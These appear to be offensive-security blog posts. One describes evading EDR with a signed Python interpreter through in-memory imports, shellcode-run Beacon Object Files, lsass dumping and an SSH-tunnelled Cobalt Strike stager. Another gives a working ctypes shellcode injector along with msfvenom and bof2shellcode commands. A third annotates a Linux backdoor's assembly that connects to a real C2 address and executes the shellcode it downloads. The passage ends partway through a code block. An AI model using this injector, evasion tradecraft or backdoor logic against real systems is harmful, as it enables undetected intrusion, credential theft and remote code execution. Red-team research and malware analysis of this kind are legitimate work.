IoAs can detect a malicious action by analyzing anomalies of the steps taken in executing that action.

Each of the statements is an approximation and does not fully represent the characteristics of a single Defense, but each still provides useful information on key properties that can be exploited for a bypass. I hate analogies when it comes to IT topics, but the statements can be seen as ski-gates for a ski track (the bypass) that does not exist yet. We just have to draw one possible track, keeping the gates as boundaries.

Main Categories of EDR Evasion operations

When it comes to evading an EDR, there are four main categories of operations:

Avoiding the EDR - this can be accomplished by operating from VPN, proxying traffic, or compromising only targets not equipped with EDRs.
Blending into the environment - executing operations by abusing tools and actions commonly observed in the target network (e.g. administrative RDP sessions, usage of legitimate administrative tools, Teams abuse).
EDR tampering - this category involves disabling or limiting EDR’s features or visibility in order to perform tasks without triggering an EDR response or without sending alerts to the central repository. For more details please check this awesome blogpost: “How To Tamper the EDR” by my friend Daniel Feichter @VirtualallocEx
Operating in blind spots - EDRs have finite resources and finite visibility, so blind spots are always present. Leveraging blind spots is powerful, since it carries the least risk of being detected.

One can relate each category to a corresponding level of risk for the relevant type of operation. I depicted the risk carried by each type of operation in a Pyramid of Pain (Attacker’s Version), where the layers of the Pyramid are ordered bottom-up by the amount of risk introduced by the operation type.


Attacker’s Pyramid of Pain - Mapping risk levels to EDR Evasion category

Avoiding EDRs is usually not viable for the whole operation, especially for multi-month ones. Ideally an attacker would want to operate in the bottom layer of the Pyramid in order to minimize the risk of being detected by EDRs; however, this type of operation must be backed by techniques and capabilities that usually require some amount of research to identify and exploit blind spots. As attackers, we decided to follow this route, and the following paragraphs outline the strategy employed.

Operational constraints

We should now define some constraints and limitations under which we want to operate. The EDR avoidance category is basically ruled out, because we want to focus on finding and exploiting EDRs’ blind spots, and also because avoiding EDRs at every stage of an operation is not always feasible. For that reason we’ll want to:

operate directly on an EDR-equipped box, without proxying traffic or otherwise avoiding engagement with the EDR.
be able to operate mainly agentless, in order to keep memory indicators low and perform common post-exploitation tasks without needing a C2 agent running.
avoid remote process injection and dropping malicious artifacts on disk, for the very same reason of keeping indicators low.
keep C2 agent execution capability as a last resort, since in some cases we’ll have to accept the added risk as a tradeoff for extended C2 features.

To operate in such a scenario we need some capabilities in our tooling, such as:

Dynamic module loading
Compatibility with community-driven tools
Traffic tunneling without spawning new processes

Choosing a language

Operations require capabilities that in turn are coded in a programming language. So it makes sense to start first by choosing a programming language that could be functional in finding blind spots AND accelerate capabilities development.

The programming language that best fits the scenario in which we’ll be operating should meet the following requirements:

The language of choice should be a non-native language (to avoid using custom compiled malicious artifacts) and provide a signed interpreter to execute code.
It must be possible to execute code without directly installing tools on the target machine.
It should be possible to import existing public tooling written in that same language.
It should be possible to develop additional capabilities without much hassle.
It should provide the least possible amount of optics to EDRs.

The candidate languages were F#, JavaScript, C# and Python. However, after excluding languages with optics integrated into the OS (such as AMSI for C# and F#) or with little public offensive tooling available, Python seemed the most promising candidate. As a matter of fact, Python can satisfy the above requirements since:

Python is an interpreted language and officially comes with a signed interpreter. It’s not tightly integrated with OS optics, since Python uses native system APIs directly, and existing monitoring tools suffer from either limited context or auditing bypasses. PEP-578 set out to solve this issue, since there was no native way of monitoring what happens during a Python script execution. However, as we’ll see later, the issue is not solved yet.
Python.org distributes Windows embeddable zip packages containing a minimal Python environment that does not require installation.
There is a huge amount of public tooling written in Python that can be imported and used.
Python can provide access to Windows APIs via ctypes, and shellcode can be injected into the Python process itself using Python, theoretically allowing the execution of any managed code or the development of any capability in Python (C# assemblies could also be run using Donut).
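For readers who have never seen PEP-578 in action, the sketch below registers a runtime audit hook with sys.addaudithook (available from Python 3.8) and records a handful of audit events. The WATCHED set and the record_event function are hypothetical names chosen for this example, and a hook installed by the script itself is only a demonstration of the mechanism, not a robust monitoring setup.

```python
import sys

# Event names from the CPython audit events table; this selection is arbitrary.
WATCHED = {"import", "exec", "compile", "ctypes.dlopen", "socket.connect"}
seen_events = []


def record_event(event, args):
    # Keep the hook cheap and exception-free: it runs for every audited action.
    if event in WATCHED:
        seen_events.append(event)


sys.addaudithook(record_event)

code = compile("x = 1 + 1", "<demo>", "exec")  # raises the "compile" audit event
exec(code)                                     # raises the "exec" audit event

print(sorted(set(seen_events)))
```

Note that a hook like this only sees something if it has been installed in the interpreter that runs the code, which is exactly the visibility gap discussed in this section.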

The properties listed above indicate a candidate blind spot within which we can build capabilities and test their effectiveness against EDRs. The fact that there currently isn’t an out-of-the-box way to inspect dynamic Python code execution opens up a very interesting avenue for attackers.

Furthermore, Python is widely used and its (signed) interpreter directly executes Windows API calls depending on the Python code being run. This implies an enormous variety of telemetry and API calls coming from the very same binary (python.exe or pythonw.exe), which earns precious extra points when it comes to operating undetected by EDRs. In fact, it will likely be difficult for EDR vendors to spot anomalies (and build detections) coming from python.exe when its baseline telemetry is so varied.

All things considered, Python provides some unique opportunities that can be exploited to operate in EDRs’ blindspot.

Leveraging Python

To help operate within the blind spots provided by Python I wrote a tool named Pyramid (available on my GitHub). The tool’s aim is to leverage Python to operate in the blind spots identified previously, currently using four main techniques:

Execution Method - Dropping and running python.exe from “Windows Embeddable Zip Package”.
Dynamic in-memory loading and execution of Python code.
Beacon Object Files execution via shellcode.
In-process C2 Agent injection.

Execution Method

The execution method for our techniques should aim at creating the least possible amount of suspicious indicators that could trigger an anomaly or a detection. Thinking about the Defenses, one could trick ML detections by using the signed Python interpreter, and IoAs by avoiding the creation of uncommon process tree patterns.

So the simplest way to achieve this is to drop the Windows embeddable zip package in a user folder or share and launch python.exe (or pythonw.exe) directly, without spawning it from C2 agents or unknown binaries. This action mimics a common execution of Python and is unlikely to be flagged as malicious by EDRs.

Dynamic in-memory import

The technique of importing dynamically in-memory Python modules has been around for quite some time and some great previous work has been done by xorrior with Empyre, scythe_io with in-memory Embedding of CPython, ajpc500 with Medusa.

The core of dynamic import is PEP-302 “New Import Hooks”, which describes how to modify the logic by which Python modules are located and loaded. Normally Python imports a module from the path on disk where it is located. However, we want to import modules from memory, not from disk.

Import hooks allow you to modify the logic by which Python modules are located and loaded. This involves defining a custom “Finder” class and adding finder objects to sys.meta_path, which holds the entries that implement Python’s default import semantics (you can view an example here).

So basically to use PEP-302 and be able to import modules in-memory one should:

Use a custom Finder class. Pyramid’s finder class is based on the Empyre one.
In-memory download a Python package as a zip.
Add the zip file finder object to sys.meta_path.
Import the zip file in memory.
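To illustrate the import-hook mechanism behind the steps above, here is a minimal sketch that imports a module from a plain dictionary instead of from disk. It is not the Pyramid or Empyre finder: it uses the modern find_spec/exec_module interface (the successor to the PEP-302 find_module/load_module methods), and the names IN_MEMORY_SOURCES, InMemoryFinder and hello_mem are hypothetical. The download and zip handling steps are deliberately left out.

```python
import importlib.abc
import importlib.util
import sys

# Hypothetical in-memory store: module name -> source code.
IN_MEMORY_SOURCES = {
    "hello_mem": "def greet(name):\n    return 'hello ' + name\n",
}


class InMemoryFinder(importlib.abc.MetaPathFinder, importlib.abc.Loader):
    """Finder and loader in one object, serving modules from IN_MEMORY_SOURCES."""

    def find_spec(self, fullname, path=None, target=None):
        if fullname in IN_MEMORY_SOURCES:
            return importlib.util.spec_from_loader(fullname, self)
        return None  # let the default finders handle everything else

    def create_module(self, spec):
        return None  # fall back to the default module creation

    def exec_module(self, module):
        source = IN_MEMORY_SOURCES[module.__name__]
        code = compile(source, f"<memory:{module.__name__}>", "exec")
        exec(code, module.__dict__)


# Put the finder first so it is consulted before the disk-based finders.
sys.meta_path.insert(0, InMemoryFinder())

import hello_mem  # resolved by InMemoryFinder, no file on disk involved

print(hello_mem.greet("world"))
```

Pure-Python modules work with this approach because their code can be compiled from a string; compiled extensions cannot be handled this way, which is the first limitation discussed next.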

There are some limitations, though. Firstly, PEP-302 does not support importing Python extensions (*.pyd files). Secondly, importing in-memory a package with many dependencies brings conflicts between them (a dependency nightmare) that need to be sorted out.

The first problem is the most complex one, since to in-memory import *.pyd files the CPython interpreter needs to be re-engineered and recompiled (that’s what scythe_io did), hence losing the precious digital signature. We can avoid losing the Python interpreter digital signature by dropping on disk the *.pyd files needed for the Python dependency that we want to import in-memory.

In fact, looking at the normal Python behavior when it comes to importing *.pyd files (that are essentially dlls), we can see that under the hood they are loaded using the windows API LoadLibraryEx and taking the path on disk. We can accept a tradeoff and import pyd files by dropping them on disk and continue importing in-memory all the other modules that do not require *.pyd files. This will allow us to maintain the interpreter digital signature and we’ll use the normal Python behaviour in loading the extensions.


Normal Python behaviour for loading pyd files

The second problem has been solved by manually addressing every dependency issue while importing the packages python-bloodhound, paramiko and impacket secretsdump, and by providing the fixed dependencies in Pyramid to use with a frozen version of the target packages. The technique execution flow is depicted in the following scheme:


Dynamically importing and executing BloodHound-Python/secretsdump with Pyramid

Here’s a demonstration of using Pyramid to run Python-BloodHound from Python.exe after having imported in-memory its dependencies. Only the Cryptodome wheel has been dropped on disk because it contains pyd files used by BloodHound.

In the following video Pyramid has also been used to dynamically in-memory import impacket-secretsdump.

Beacon Object File execution via shellcode

This technique has already been introduced in my previous blogpost, however, the TL;DR is that we can use COFFloader and BOF2Shellcode to execute Beacon Object Files via shellcode. The shellcode can then be injected directly into python.exe using Python and ctypes.

We can dump lsass directly from python.exe using nanodump, but we need to modify it a bit in order to work with our technique. Since we’ll be executing a BOF without a Cobalt Strike Beacon running, we should get rid of all the internal Beacon API calls, because otherwise the BOF will crash. We should also hardcode the command line parameters to increase BOF execution stability, thus getting rid of the command line parsing functions. Finally, we can choose our preferred method of dumping lsass and hardcode it too.

Bear in mind that with this technique no pyd files are dropped on disk.

The technique execution flow is depicted in the following scheme:


Dumping LSASS with Pyramid and nanodump

In the following video Pyramid has been executed to dump lsass on a machine equipped with a top-tier EDR (details have been blurred and I won’t name the EDR product) using the nanodump BOF and the process forking technique.

You can find the modified nanodump used for the demo here on my github

In-process C2 agent injection

Executing a C2 agent increases the chances of detection by memory scans; however, certain scenarios might require agent execution for the operation to continue. For this reason Pyramid provides the capability of executing a C2 agent stager and tunnelling its traffic through SSH, all within the python.exe process. This is achieved by first dynamically importing paramiko and then starting SSH local port forwarding to an attacker-controlled SSH server in a new local thread.

The C2 agent shellcode is then injected and executed in-process. The stager should be generated using the host 127.0.0.1 as C2 server with the same port opened locally by the SSH local port forward. The technique execution flow is depicted in the following scheme:


In-process tunneling a Cobalt Strike Beacon with Pyramid

In the following video Pyramid has been executed to perform SSH local port forwarding and execute a Cobalt Strike Beacon stager, tunneling its traffic over SSH. The OS was equipped with a top-tier EDR in this case too.

Conclusions

It has been demonstrated that Python provides some key properties that effectively create blind spots for EDR detection, namely:

Python’s wide usage creates a varied baseline telemetry for the Python interpreter, which runs APIs natively. This can make it harder for EDR vendors to spot anomalies coming from python.exe or pythonw.exe.
Python lacks transparency for dynamic code executed from python.exe or pythonw.exe.
Python Foundation officially provides a “Windows embeddable package” that can be used to run Python with a minimal environment without installation. The package comes with signed binaries.

These properties, coupled with operational capabilities such as BOF execution, dynamic import of modules and in-process shellcode injection, can help in operating within EDRs’ blind spots. The Pyramid tool has been developed to put together all the concepts presented in this post and to bring operational capabilities that can be used from the Python Windows embeddable package.

How to defend from this

One obvious way to defend from these techniques would be to flag Python interpreters as Potentially Unwanted Application, forcing EDR customers to investigate alerts and approve or deny Python usage for specific users. However I don’t think that it’ll be feasible in every situation. Attackers could also bring their own interpreter and still use these techniques, but in doing so they’ll lose the Interpreter digital signature, so the attack effectiveness will probably be downgraded.

As an EDR vendor, I would also want to analyze python.exe and pythonw.exe behaviour without biases brought by the varied baseline telemetry that they would have. In this way the Python binaries will be treated as if they were unknown, which is in fact true regarding their behaviour because API calls made by the interpreter are related to the Python code executed.

Running Cobalt Strike BOFs from Python

2022-02-16T00:00:00-05:00

TL;DR

Python can be used to run Cobalt Strike’s BOFs by building on previous work from Trustedsec and FalconForce: one can pick a BOF and use BOF2Shellcode to embed the shellcode in a Python injector. This brings some post-ex capabilities that could be added to existing frameworks or deployed from a gained foothold, making use of a signed binary (python.exe) as a host process for running BOFs via local shellcode injection - PoC on my GitHub.

Intro

Python got great popularity as a C2 language in recent years and the offsec community brought many great projects like TrevorC2, WEASEL, pupy, etc. However, its popularity as a Windows-agent-language never really took off, mainly because of some significant limitations such as:

Final .exe size made huge because of Python interpreter dependencies to be included;
Ease of getting source code from Python artifacts;
Complexity of creating shellcode that executes python code.

These drawbacks stem from the fact that Python is an interpreted language, so you basically have to bring the Python interpreter and its dependencies with you, whether you’re creating a stage(r) shellcode or an .exe to deliver. However, I would group these 3 big limitations under the “Getting Access” phase of an engagement, since Python will basically be ruled out if you’re trying to phish or exploit some vulnerability that requires stable and tiny shellcode.

But still, to me Python has so much yet to give during the “Post Exploitation” phase, because, well…“in the EDR era signed binaries are kings”, and it’s worth reminding that the official Python binary is signed indeed. It’s also worth mentioning that in enterprise environments devs do crazy stuff so Python is pretty common almost everywhere. Using python would be a viable way to blend-in on some machines, if we only had modern capabilities to leverage.

This thought sat in the back seat of my mind for quite some time, until I saw some recent brilliant projects that opened up some new avenues.

PoC || GTFO

Earlier in 2021 Kevin Haubris from Trustedsec published a cool project called COFFLoader, which basically lets you load and run Cobalt Strike’s Beacon Object Files (BOFs) outside of Cobalt Strike itself. Some weeks ago Gijs Hollestelle from FalconForce published BOF2Shellcode, which essentially converts BOFs to raw shellcode and combines it with COFFLoader (converted too) so that BOFs can be loaded by the same resulting shellcode.

Reading the FalconForce post (I highly encourage you to read it too, since Gijs described the whole process of getting things working), I understood that one could also run BOFs with Python by using the shellcode generated by BOF2Shellcode and the help of an injector. Let’s try this out. As an injector I opted for local shellcode injection using HeapAlloc, to which I added a VirtualProtect call to set execute-only permissions, since this might be useful for evasion and shenanigans. Bear in mind that with execute-only permissions you’re out in the cold if you use self-decoding shellcode or more complex ones. This only works if the shellcode itself does not need write or read permissions, and this might be the case with some BOFs. Here’s the Python injector I used:

"""
	Author: @naksyn

	BOF runner using local shellcode injection with HeapAlloc()
	/CreateThread() and setting execute-only permissions with
	VirtualProtect().
	Warning - stagers and shellcodes with self-decoding stubs
	might not work, change permissions accordingly or remove
	VirtualProtect call by keeping RWX.

"""

from ctypes import *
from ctypes.wintypes import *

# Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)- Author Bobby Cooke @0xBoku - https://www.exploit-db.com/exploits/49819
calc = b"\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
calc += b"\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
calc += b"\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
calc += b"\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
calc += b"\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
calc += b"\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
calc += b"\x48\x83\xec\x20\x41\xff\xd6"

shellcode=calc
kernel32 = ctypes.windll.kernel32
isx64 = sizeof(c_void_p) == sizeof(c_ulonglong)

_kernel32 = WinDLL('kernel32')
HEAP_ZERO_MEMORY = 0x00000008
HEAP_CREATE_ENABLE_EXECUTE = 0x00040000
PAGE_READ_EXECUTE = 0x20
PAGE_EXECUTE= 0x10
ULONG_PTR = c_ulonglong if isx64 else DWORD
SIZE_T = ULONG_PTR

# Functions Prototypes
VirtualProtect = _kernel32.VirtualProtect
VirtualProtect.restype = BOOL
VirtualProtect.argtypes = [ LPVOID, SIZE_T, DWORD, PDWORD ]

# HeapAlloc()
HeapAlloc = _kernel32.HeapAlloc
HeapAlloc.restype = LPVOID
HeapAlloc.argtypes = [ HANDLE, DWORD, SIZE_T ]

# HeapCreate()
HeapCreate = _kernel32.HeapCreate
HeapCreate.argtypes = [DWORD, SIZE_T, SIZE_T]
HeapCreate.restype = HANDLE

# RtlMoveMemory()
RtlMoveMemory = _kernel32.RtlMoveMemory
RtlMoveMemory.argtypes = [LPVOID, LPVOID, SIZE_T ]
RtlMoveMemory.restype = LPVOID

# CreateThread()
CreateThread = _kernel32.CreateThread
CreateThread.argtypes = [ LPVOID, SIZE_T, LPVOID, LPVOID, DWORD, LPVOID ]
CreateThread.restype = HANDLE

# WaitForSingleObject()
WaitForSingleObject = _kernel32.WaitForSingleObject
WaitForSingleObject.argtypes = [HANDLE, DWORD]
WaitForSingleObject.restype = DWORD


heapHandle = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, len(shellcode), 0)
HeapAlloc(heapHandle, HEAP_ZERO_MEMORY, len(shellcode))
print('[+] Heap allocated at: {:08X}'.format(heapHandle))
RtlMoveMemory(heapHandle, shellcode, len(shellcode))
print('[+] Shellcode copied into memory.')

VirtualProtect(heapHandle, len(shellcode), PAGE_EXECUTE , ctypes.c_ulong(0))
print('[+] Set execute-only permissions on memory')
threadHandle = CreateThread(0, 0, heapHandle, 0, 0, 0)
print('[+] Executed Thread in current process.')
WaitForSingleObject(threadHandle, 0xFFFFFFFF)

At this point we just need to grab the shellcode from BOF2Shellcode using a BOF of our choice. I opted for Trustedsec’s Tasklist and used bof2shellcode to generate the resulting shellcode, including the COFFLoader:

python3 bof2shellcode.py -i /home/naksyn/bofs/tasklist.x64.o -o tasklist.x64.bin

I then used msfvenom to make tasklist.x64.bin trivially embeddable in a python script:

msfvenom -p generic/custom PAYLOADFILE=tasklist.x64.bin -f python > sc_tasklist.txt

So after pasting the shellcode into the python injector script let’s see the tasklist BOF coughed out by Python:


Outro

I’ve always been amazed by crowdsourced capabilities and their integration into toolsets. Some time ago Joe Vest kickstarted a Community Kit, a central repository of extensions written by the user community to extend the capabilities of Cobalt Strike. These extensions are written by some of the smartest people in the industry, and being able to leverage them in other C2s is undoubtedly a “must have” feature. Indeed, a few days ago Moloch added support for extensions/BOFs to the Sliver framework, written in Go. The same capability could be leveraged with some effort on every C2 with Python-based agents, and this post described one way to do it.

Repurposing a Linux Assembly backdoor caught in the wild

2020-04-13T00:00:00-04:00

This work is based on Aneesh Dogra’s blogpost describing a new small linux backdoor caught in the wild. The backdoor main functions are fairly explained in the blogpost, however I wanted to dig deeper and look under the hood to check how this backdoor can be repurposed. I thought this might also be a good opportunity to sharpen my assembler skills while exploring some interesting concepts. The backdoor essentially calls back to a C2 and downloads shellcode to be executed in the context of the current process.

As we are dealing with a 64 bit ELF, Linux x86_64 system calls use designated registers for the arguments. The registers for the x86_64 calling sequence are:

RAX -> system call number
RDI -> first argument
RSI -> second argument
RDX -> third argument
R10 -> fourth argument
R8 -> fifth argument
R9 -> sixth argument
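When reading the listing further down, it helps to have the calling convention above in a small lookup helper. The sketch below is only an analysis aid: SYSCALLS is a hand-picked subset of the x86_64 syscall table covering the numbers that appear in this backdoor, and describe_syscall is a hypothetical helper name.

```python
# x86_64 Linux syscall argument registers, in order.
ARG_REGISTERS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")

# Subset of the x86_64 syscall table: only the numbers used by this backdoor.
SYSCALLS = {0: "read", 9: "mmap", 35: "nanosleep", 41: "socket", 42: "connect", 60: "exit"}


def describe_syscall(regs):
    """Render a register snapshot taken right before a `syscall` instruction."""
    name = SYSCALLS.get(regs["rax"], f"unknown({regs['rax']})")
    args = ", ".join(f"{reg}={regs[reg]:#x}" for reg in ARG_REGISTERS if reg in regs)
    return f"{name}({args})"


# Register values set up before the second syscall of the listing.
print(describe_syscall({"rax": 41, "rdi": 2, "rsi": 1, "rdx": 0}))
# prints: socket(rdi=0x2, rsi=0x1, rdx=0x0)
```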

Syscall results are returned in the RAX register. Syscalls are the interface between user programs and the Linux kernel: they are used to let the kernel perform various system tasks, such as file access, process management and networking. It’s handy to keep the syscall table from the Linux kernel at hand to map which syscall has been invoked in the assembly code. Now let’s get our hands dirty and reverse the most important functionalities of the backdoor that Aneesh kindly provided. Here is the full backdoor assembly with comments after my analysis:

129: entry0 (int64_t arg3);
;
0x00400078      xor rdi, rdi
0x0040007b      push 9             
0x0040007d      pop rax
0x0040007e      cdq
0x0040007f      mov dh, 0x10       ; 16
0x00400081      mov rsi, rdx       ; arg3 ; 4096
0x00400084      xor r9, r9
0x00400087      push 0x22          ; 34
0x00400089      pop r10
0x0040008b      mov dl, 7
0x0040008d      syscall            ; mmap syscall
0x0040008f      test rax, rax
0x00400092      js 0x4000e6
0x00400094      push 0xa           ; 10
0x00400096      pop r9
0x00400098      push rsi           ; saves 4096 on the stack for later use in read syscall
0x00400099      push rax           ; saves mmapped address on the stack for later use in read syscall and shellcode execution
0x0040009a      push 0x29          ; 41
0x0040009c      pop rax
0x0040009d      cdq
0x0040009e      push 2             
0x004000a0      pop rdi
0x004000a1      push 1             
0x004000a3      pop rsi
0x004000a4      syscall            ; socket syscall
0x004000a6      test rax, rax
0x004000a9      js 0x4000e6        ; jump forward to exit block if socket unsuccessful
0x004000ab      xchg rax, rdi
0x004000ad      movabs rcx, 0xc2edf86839050002 ; gets here if socket successful or connect unsuccessful and after nanosleep
0x004000b7      push rcx           ; holds the connect addr structure
0x004000b8      mov rsi, rsp       ; pointer to the addr structure
0x004000bb      push 0x10          ; 16
0x004000bd      pop rdx
0x004000be      push 0x2a          ; 42
0x004000c0      pop rax
0x004000c1      syscall            ; connect syscall
0x004000c3      pop rcx
0x004000c4      test rax, rax
0x004000c7      jns 0x4000ee       ; jump to read and execute shellcode if connect successful
0x004000c9      dec r9
0x004000cc      je 0x4000e6        ; r9 counts down from 10 on each failed connect; exit when it reaches 0
0x004000ce      push rdi
0x004000cf      push 0x23          ; 35
0x004000d1      pop rax
0x004000d2      push 0
0x004000d4      push 5             
0x004000d6      mov rdi, rsp
0x004000d9      xor rsi, rsi
0x004000dc      syscall            ; nanosleep syscall
0x004000de      pop rcx
0x004000df      pop rcx
0x004000e0      pop rdi
0x004000e1      test rax, rax
0x004000e4      jns 0x4000ad       ; jump back and retry connect if nanosleep succeeded (RAX >= 0)
0x004000e6      push 0x3c          ; gets here if socket unsuccessful or tried connecting 10 times or read failed or mmap failed
0x004000e8      pop rax
0x004000e9      push 1             
0x004000eb      pop rdi
0x004000ec      syscall            ; exit syscall
0x004000ee      pop rsi            ; gets here if connect successful, so RAX=0, rsi=mmapped address popped from the stack
0x004000ef      pop rdx            ; 4096 bytes to be read from connect file descriptor
0x004000f0      syscall            ; read syscall; rdi=connect file descriptor
0x004000f2      test rax, rax
0x004000f5      js 0x4000e6
0x004000f7      jmp rsi            ; execute the bytes read from the connect syscall (shellcode) in the memory mapped address space

Let’s start from the beginning by dividing the assembly into chunks, with a syscall at the end of each one, keeping in mind that the backdoor connects to a C2 and executes shellcode, so somewhere along the journey we should expect networking and memory related syscalls.

0x00400078      xor rdi, rdi
0x0040007b      push 9             
0x0040007d      pop rax
0x0040007e      cdq
0x0040007f      mov dh, 0x10       ; 16
0x00400081      mov rsi, rdx       ; arg3 ; 4096
0x00400084      xor r9, r9
0x00400087      push 0x22          ; 34
0x00400089      pop r10
0x0040008b      mov dl, 7
0x0040008d      syscall            ; mmap syscall

Syscall number 9 maps to the mmap function, declared as: void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset); We should keep it in mind while poking around the registers to understand how mmap is called. From the assembly we can understand the following:

addr --> RDI = 0 (NULL, so the kernel chooses the address)
length --> RSI = 0x1000 (4096 bytes, one page at the usual x86 page size)
prot --> RDX = 0x1007 (PROT_READ | PROT_WRITE | PROT_EXEC is 0x7; the extra 0x1000 bit is left over from loading the length through RDX)
flags --> R10 = 0x22 (MAP_PRIVATE | MAP_ANONYMOUS)
fd --> R8 = 0 (never written by the code, so this assumes its initial value; the fd is ignored for MAP_ANONYMOUS mappings)
offset --> R9 = 0
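The register values above can be double-checked by decoding them against the Linux x86_64 flag constants. This is a small sketch with the constants hardcoded (rather than taken from Python’s mmap module, whose constants depend on the platform running the script); decode is a hypothetical helper name.

```python
# Linux x86_64 constants, hardcoded so the result does not depend on the host OS.
PROT_FLAGS = {0x1: "PROT_READ", 0x2: "PROT_WRITE", 0x4: "PROT_EXEC"}
MAP_FLAGS = {0x02: "MAP_PRIVATE", 0x20: "MAP_ANONYMOUS"}

rdx = 0x1007  # left in RDX by "mov dh, 0x10" followed by "mov dl, 7"
r10 = 0x22    # loaded via "push 0x22 / pop r10"


def decode(value, table):
    """Return the known flag names set in value, plus any bits not in the table."""
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)  # sum(table) adds up the dict keys (the flag bits)
    return names, leftover


print(decode(rdx, PROT_FLAGS))
print(decode(r10, MAP_FLAGS))
```

The leftover 0x1000 in prot is the page-size value that was loaded into DH to build the length; only the low three bits carry the read, write and execute permissions.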

To better understand its arguments let’s summon the mmap man page:

mmap() creates a new mapping in the virtual address space of the calling process. The starting address for the new mapping is specified in addr. The length argument specifies the length of the mapping (which must be greater than 0). If addr is NULL, then the kernel chooses the (page-aligned) address at which to create the mapping; this is the most portable method of creating a new mapping. If addr is not NULL, then the kernel takes it as a hint about where to place the mapping; on Linux, the kernel will pick a nearby page boundary (but always above or equal to the value specified by /proc/sys/vm/mmap_min_addr) and attempt to create the mapping there. If another mapping already exists there, the kernel picks a new address that may or may not depend on the hint. The address of the new mapping is returned as the result of the call. The prot argument describes the desired memory protection of the mapping (and must not conflict with the open mode of the file).

From what we know, mmap is used by this tiny malware to allocate a 4096-byte anonymous memory region inside the process’ own address space, with the page set as readable, writable and executable. This is where the downloaded shellcode will be stored and run.

Here is the next assembly chunk to be analyzed:

0x00400094      push 0xa           ; 10
0x00400096      pop r9
0x00400098      push rsi           ; saves 4096 on the stack for later use in read syscall
0x00400099      push rax           ; saves mmapped address on the stack for later use in read syscall and shellcode execution
0x0040009a      push 0x29          ; 41
0x0040009c      pop rax
0x0040009d      cdq
0x0040009e      push 2             
0x004000a0      pop rdi
0x004000a1      push 1             
0x004000a3      pop rsi
0x004000a4      syscall            ; socket syscall

Syscall number 41 maps to the socket function, declared as int socket(int domain, int type, int protocol); As per the man page:

socket() creates an endpoint for communication and returns a file descriptor that refers to that endpoint. The file descriptor returned by a successful call will be the lowest-numbered file descriptor not currently open for the process. This code snippet creates an endpoint for communication of type SOCK_STREAM (RSI=1), in the PF_INET domain (RDI=2) and with the IP protocol (RDX=0, zeroed by cdq).

This one is pretty self-explanatory, so let’s dig into the next chunk:

0x004000a6      test rax, rax
0x004000a9      js 0x4000e6        ; jump forward to exit block if socket unsuccessful
0x004000ab      xchg rax, rdi
0x004000ad      movabs rcx, 0xc2edf86839050002 ; gets here if socket successful or connect unsuccessful and after nanosleep
0x004000b7      push rcx           ; holds the connect addr structure
0x004000b8      mov rsi, rsp       ; pointer to the addr structure
0x004000bb      push 0x10          ; 16
0x004000bd      pop rdx
0x004000be      push 0x2a          ; 42
0x004000c0      pop rax
0x004000c1      syscall            ; connect syscall

The code sets up syscall 42, connect, which is declared as int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen). The struct sockaddr is loaded into the RCX register and pushed onto the stack, and it can be broken down this way:

02 00 AF_INET
05 39 port 1337
68 f8 ed c2 IP 104.248.237.194

These are the IP address and port of the malware C2 that the backdoor connects to.
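The same breakdown can be reproduced programmatically. The sketch below, with a helper name of my own choosing, unpacks the 64-bit immediate from the movabs instruction: the register value is stored little-endian in memory, the family field is host byte order and the port is network byte order.

```python
import socket
import struct


def decode_sockaddr_in(imm64: int):
    """Split the movabs immediate into (family, port, ip)."""
    raw = struct.pack("<Q", imm64)            # bytes as they land on the stack
    family = struct.unpack("<H", raw[0:2])[0]  # sin_family, host byte order
    port = struct.unpack(">H", raw[2:4])[0]    # sin_port, network byte order
    ip = socket.inet_ntoa(raw[4:8])            # sin_addr
    return family, port, ip


print(decode_sockaddr_in(0xC2EDF86839050002))
# (2, 1337, '104.248.237.194')
```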

Here is the next assembly snippet:

0x004000c3      pop rcx
0x004000c4      test rax, rax
0x004000c7      jns 0x4000ee       ; jump to read and execute shellcode if connect successful
0x004000c9      dec r9
0x004000cc      je 0x4000e6        ; r9 counts down from 10; exit when it reaches 0 (all connect attempts failed)
0x004000ce      push rdi
0x004000cf      push 0x23          ; 35
0x004000d1      pop rax
0x004000d2      push 0
0x004000d4      push 5             
0x004000d6      mov rdi, rsp
0x004000d9      xor rsi, rsi
0x004000dc      syscall            ; nanosleep syscall

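Syscall number 35 invokes nanosleep, declared as int nanosleep(const struct timespec *req, struct timespec *rem). Here req points to the two values just pushed on the stack (tv_sec = 5, tv_nsec = 0) and rem is NULL, since RSI is zeroed. As per the man page: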

nanosleep() suspends the execution of the calling thread until either at least the time specified in *req has elapsed, or the delivery of a signal that triggers the invocation of a handler in the calling thread or that terminates the process. […] On successfully sleeping for the requested interval, nanosleep() returns 0. If the call is interrupted by a signal handler or encounters an error, then it returns -1, with errno set to indicate the error.
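Taken together, the r9 counter and the nanosleep call form a bounded retry loop: up to ten connect attempts, five seconds apart. Below is a rough Python equivalent of that control flow only. The function name and parameters are mine, and unlike the backdoor, which reuses a single socket, this sketch opens a fresh socket per attempt to keep things simple.

```python
import socket
import time


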